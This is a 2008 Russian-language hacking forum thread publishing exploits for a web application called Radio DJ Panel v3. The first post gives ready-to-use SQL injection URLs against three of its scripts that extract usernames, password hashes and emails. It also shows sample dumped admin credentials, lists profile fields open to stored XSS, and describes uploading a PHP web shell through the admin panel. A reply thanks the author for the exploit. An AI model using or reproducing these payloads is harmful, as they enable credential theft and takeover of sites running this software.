Radio DJ Panel v3 SQL Injection |
27.09.2008, 14:28
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
Radio DJ Panel v3 SQL Injection
Офф.сайт: www.quickscriptz.ca.kz
Префикс таблиц бд: rp_
Табличка: rp_users
Клонки: djname,username,passwrd,email,rank,id
Админка: http://localhost/admin/
[SQL-Injection]
Сценарий timetable.php
Эксплойт:
Код:
http://localhost/[installdir]/timetable.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,passwrd,email,rank),user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+rp_users+where+id=1/*
Уязвимого кода предоставить не могу так как всё закодированно в base64(кому надо тот раскодирует).
Смотреть в исходнике
Код:
<td width='150px' align='center'>12:00 - 01:00 AM</td>
<td width='150px' align='center'><b><font color='black'>DJ admin:admin:92ceae43616aa3a8cfde62e236ccc657:admin@admin.ru:Administrator</font></b><td>
Сценарий timetable_public.php
Эксплойт:
Код:
http://localhost/[installdir]/timetable_public.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,passwrd,email,rank),user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+rp_users+where+id=1/*
Сценарий viewprofile.php
Эксплойт:
Код:
http://localhost/[installdir]/viewprofile.php?dj=-1'+union+select+concat_ws(0x3a,djname,username,passwrd,email,rank),user(),version(),4,5,6,7,8,9,10,11+from+rp_users+where+id=1/*
[XSS Active]
В профиле уязвимые поля: Favourite Food,Pet Peeves,Sayings,About You,Avatar URL.
[Шелл]
Panel Configuration -> Upload Files льём наш шелл с расширением . php
Шелл будет тут:
http://localhost/ [installdir]/uploads/shell.php
(c) ~!Dok_tOR!~
|
|
|
29.09.2008, 22:01
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами:
9625938
Репутация:
32
|
|
Спасибо пригодилось 
P.s. Ток надо было в "Движки Cms и блоги" |
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?886700){kind=avatar}
Комбинированный вид
